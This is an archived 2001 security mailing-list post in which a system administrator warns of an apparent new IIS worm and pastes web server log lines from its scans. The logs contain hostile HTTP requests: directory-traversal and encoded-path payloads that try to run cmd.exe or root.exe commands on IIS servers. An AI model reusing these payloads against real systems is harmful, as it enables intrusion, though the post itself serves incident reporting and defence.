New worm ??

From: Cory McIntire (coryat_private)
Date: Tue Sep 18 2001 - 07:51:01 PDT

Next message: Olle Segerdahl: "Concept Virus(CV) V.5 - Advisory and Quick analysis"

Previous message: Fred Cohen: "More complete log - looks viral to me..."
Next in thread: Pedro Miller Rabinovitch: "Re: New worm ??"
Reply: Pedro Miller Rabinovitch: "Re: New worm ??"
Reply: Jay D. Dyson: "Re: New worm ??"
Reply: Olivier DEMBOUR: "RE: New worm ??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello, 
I and a few others I know are getting bombard on our machines with IIS 
requests....looks like another worm, and its much smarter than before, it 
seems to stay within the same class A and sometimes the same class B as the 
attacking machine is in. here is an excerpt of what i believe is the full 
scan....

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

just thought I would let you guys know...this one looks bad fella.....thank 
god for apache.....that is of course, if there isnt a huge bog down on the 
net....=[

cory

p.s. Infected machines attempt to get you to download a readme.eml file, that 
has an .exe embedded. Not sure what is in that file, or if IE will open it 
automatically, (I'm on linux) , let me know, this one is spreading and 
resending _alot_ getting hits from the same machines now...2-4 times

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Olle Segerdahl: "Concept Virus(CV) V.5 - Advisory and Quick analysis"
Previous message: Fred Cohen: "More complete log - looks viral to me..."
Next in thread: Pedro Miller Rabinovitch: "Re: New worm ??"
Reply: Pedro Miller Rabinovitch: "Re: New worm ??"
Reply: Jay D. Dyson: "Re: New worm ??"
Reply: Olivier DEMBOUR: "RE: New worm ??"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:26:13 PDT